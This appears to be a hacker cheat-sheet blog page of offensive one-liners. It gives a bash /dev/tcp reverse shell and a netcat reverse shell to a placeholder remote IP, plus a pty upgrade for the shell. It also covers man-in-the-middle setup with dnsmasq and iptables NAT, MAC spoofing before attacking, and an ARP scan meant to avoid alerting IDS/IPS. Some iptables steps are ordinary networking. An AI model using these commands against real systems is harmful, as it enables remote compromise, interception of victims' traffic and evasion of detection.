fancy hacking image

Hack the planet...!

Reverse-Shell Plain Bash

When you can inject system commands on a target and want to spawn a reverse-shell but no tools like perl, python, netcat or similar is available, there's a simple way to use built-ins:

bash -i >& /dev/tcp/{remote ip}/{remote port} 0>&1


If you act as a man-in-the-middle (WiFi AP, arp-spoofing, whatever) you don't want the victim to detect malicious behavior. To do so it's recommended to setup up a dns server, dhcp server and serve any network (internet e.g).

The tool dnsmasq can be used for that case. It contains a DHCP and DNS server. DNS requests are forwarded to DNS server configured in /etc/hosts and you can specify a dhcp range in one config file:


Start dnsmasq with $ dnsmasq -C dnsmasq.conf

What's missing?!

Enable routing/nat:

$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


Be sure to assign a ip address from the correct network before you start dnsmasq!

You can download the example dnsmasq config file here or using wget

Before you hack - Change your MAC

Before you attack a target over a network, be sure that you don't reveal your correct MAC address!

$ macchanger -r eth0

Your actual MAC address keeps unchanged, after a reboot the settings are restored. If you want to avoid rebooting your machine, type:

$ macchanger -p eth0

Manual ARP Scan

If you're in a network and you want to know who's also there AND you don't want to alert IDS/IPS Systems caused by using tools like nmap. You can perform an arp scan using built-in tools:

$ for i in {1..254}; do ping -c1 192.168.1.$i & /bin/true 2>&1 > /dev/null; done

After a couple of seconds you see the background jobs getting finished. Press a few times enter, and after it hit $ ip n to display the local arp-cache. Maybe you filter the content: $ ip n | grep -iv "failed".

Finally you should see every participant of the network!

$ ip n | grep -iv failed
Spawn reverse-shell with netcat

On local machine, setup listener: $ nc -lvp 443 On remote machine, connect back: $ nc -e /bin/bash 443

Spawn real bash in reverse shell

Sometines when you triggered a reverse shell and you want to compile an exploit for example, you need to gain a full-access shell. This can be done using a python one-liner: $ python -c 'import pty; pty.spawn("/bin/bash")'


The linux/unix tool iptables is very important when doing network stuff! It requires root privileges and is usally located in /sbin/iptables. You can do a lot of stuff with it, blacklist IPs, forward traffic to another port/IP or setup natting. I will give you a few examples:

IP forwarding

In most cases you might want to advise the kernel to forward packets (as man-in-the-middle e.G.). To do so, simply type:

echo 1 > /proc/sys/net/ipv4/ip_forward

After the next reboot, those settings are discarded. To make these settings persistent, type:

sysctl -w net.ipv4.ip_forward=1


If you're a man-in-the-middle you might want to enable natting, so the target you're spoofing can normally continue surfing:

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Assuming eth0 is your wan-connected interface.

forward traffic to ip/port

If you want to redirect specific traffic to another ip or port, you need to let it the kernel know:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 1337 -j DNAT --to-destination {REMOTEIP}:1337
iptables -t nat -A POSTROUTING -d {REMOTEIP}/32 -p tcp -m tcp --dport 1337 -j SNAT --to-source {YOURIP}